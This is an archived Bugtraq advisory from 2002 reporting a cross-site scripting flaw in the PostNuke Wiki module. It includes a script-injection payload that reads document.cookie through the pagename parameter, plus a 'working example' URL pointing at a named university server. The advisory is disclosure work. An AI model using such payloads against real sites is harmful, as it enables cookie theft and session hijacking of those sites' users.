Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Wiki module postnuke Cross Site Scripting Vulnerability

From: Pistone <jorgep () spdps com ar>
Date: Tue, 16 Jul 2002 21:49:24 -0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ----------------------------------------------------
Class :         input Validation Error

Risk :            Due to the simplicity of the attack and the number of sites
                   that run phpwiki, the risk is classified as Medium to High.
- ----------------------------------------------------
This wiki is running as a PostNuke module. 
- ------------------------------------

Exploit:         pagename=|script|alert(document.cookie)|/script|

Change | x <>

Working Example :

http://centre.ics.uci.edu/~grape/modules.php?op=modload&name=Wiki&file=index&pagename=|script|alert(document.cookie)|/script|

- --------------------------------------------------------------------------------------------
programmer of wiki module and admin of postnuke-espanol.org receives a copy 
this report.
- --------------------------------------------------------


Salu2

Pistone
- - --------
Http://www.gauchohack.com.ar
Http://www.hackindex.org


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9NL8cY47Vx76lNPkRAsNDAJ9M5eXRMxL1ASb2TlWaDaveotKAbgCZAQSz
PlAN98+qigqp8S9pkkfFRm4=
=c2FT
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: